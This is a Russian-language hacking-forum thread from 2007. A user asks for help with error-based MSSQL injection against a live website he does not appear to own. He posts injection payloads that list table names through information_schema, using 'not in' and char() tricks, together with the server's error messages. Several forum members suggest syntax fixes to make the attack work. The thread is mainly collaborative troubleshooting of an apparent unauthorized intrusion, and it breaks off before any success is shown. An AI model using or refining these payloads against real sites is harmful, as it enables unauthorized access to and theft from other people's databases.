ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[Microsoft][ODBC SQL Server Driver]
  #1  
Старый 14.01.2007, 20:34
Аватар для sh-smoker
sh-smoker
Познающий
Регистрация: 13.01.2007
Сообщений: 35
Провел на форуме:
115804

Репутация: -12
По умолчанию [Microsoft][ODBC SQL Server Driver]

Хай.
Короче есть проблема которую нужно решить
Существует сайт.
На сайте инъекция (MSSQL)
При запросе такого вида:
===============================
-1+select+top+1+table_name+from+information_schema. tables
===============================

В ошибке выводится имя таблицы:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Products' to a column of data type int
===============================

Одна таблица есть, пробую вытащить имя второй таблицы таким запросом:
===============================
select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in('Products')
===============================

На что сервак мне отвечает:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near 'Products'
===============================

На многих серваках этот приём срабатывал.....
Ошибка синтаксиса, хмм..
В чем же она заключается???
 
Ответить с цитированием

  #2  
Старый 14.01.2007, 20:59
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

после in пробел есть?
 
Ответить с цитированием

  #3  
Старый 14.01.2007, 21:07
Аватар для sh-smoker
sh-smoker
Познающий
Регистрация: 13.01.2007
Сообщений: 35
Провел на форуме:
115804

Репутация: -12
По умолчанию

угу
 
Ответить с цитированием

  #4  
Старый 14.01.2007, 21:51
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

мб забыл -- поставить?
__________________
 
Ответить с цитированием

  #5  
Старый 14.01.2007, 22:09
Аватар для sh-smoker
sh-smoker
Познающий
Регистрация: 13.01.2007
Сообщений: 35
Провел на форуме:
115804

Репутация: -12
По умолчанию

нет, комент там и не нужен все ок
Может есть какиенить альтернативы по перебору колонок?
 
Ответить с цитированием

  #6  
Старый 14.01.2007, 22:22
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

попробуй скобки убрать, т.е. просто table_name+not+in+'Products'
 
Ответить с цитированием

  #7  
Старый 14.01.2007, 22:34
Аватар для sh-smoker
sh-smoker
Познающий
Регистрация: 13.01.2007
Сообщений: 35
Провел на форуме:
115804

Репутация: -12
По умолчанию

Спасибо попробую
 
Ответить с цитированием

  #8  
Старый 14.01.2007, 22:54
Аватар для sh-smoker
sh-smoker
Познающий
Регистрация: 13.01.2007
Сообщений: 35
Провел на форуме:
115804

Репутация: -12
По умолчанию

Попробовал, вот что мне вылезло:
============================
Incorrect syntax near ''
============================
 
Ответить с цитированием

  #9  
Старый 14.01.2007, 23:05
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Решение - кинь ссылку, вторую теу уже создаешь )
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #10  
Старый 14.01.2007, 23:24
Аватар для sh-smoker
sh-smoker
Познающий
Регистрация: 13.01.2007
Сообщений: 35
Провел на форуме:
115804

Репутация: -12
По умолчанию

хм интересено, если 'Products' перевести в вид "char(....)"
типа :

================================
select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in(char(....))
================================

Последний раз редактировалось sh-smoker; 14.01.2007 в 23:27..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ